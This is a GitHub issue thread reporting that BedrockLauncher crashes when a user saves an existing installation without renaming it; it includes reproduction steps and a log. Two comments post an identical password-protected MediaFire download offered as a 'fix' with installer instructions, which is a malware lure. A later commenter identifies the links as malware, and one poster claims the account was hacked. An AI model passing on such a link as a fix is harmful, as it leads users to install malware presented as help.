### ISSUE TITLE
[BUG] Clicking Save after editing a pre existing installation without modifying the name craches the launcher

### ISSUE THREAD

**Issue by DLazaridisGM** [BedrockLauncher/BedrockLauncher#505]
**Describe the bug**
Clicking edit and then Save on a pre existing installation without modifying the name craches the launcher

**To Reproduce**
1. Go to 'Installations'
2. Click on 'new installation'
3. Add a name (Optional)
4. Click on 'Create'
5. Hover over the created installation and click on the 3 dots (...)
6. Click on 'Edit'
7. Click on 'Save'

**Expected behavior**
Launcher shouldn't crash when clicking save after editing a pre existing installation without modifying the name. 

Log
Might be useful
[Log_2024-08-26_10-20-11.log](https://github.com/user-attachments/files/16745453/Log_2024-08-26_10-20-11.log)

**Screenshots**

https://github.com/user-attachments/assets/15ff71b1-d8da-4d4e-a87b-a09024ea1051

**Additional context**
any edits to the installation are still saved
affects: 2024.8.18.21 and older

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TheNatBoi** [comment]
Just so people are aware, those two mediafire links are malware. DO NOT click on them.

**Comment by MoonShadowIllusion** [comment]
> Just so people are aware, those two mediafire links are malware. DO NOT click on them.

my account seem to have been hacked, DO NOT click it
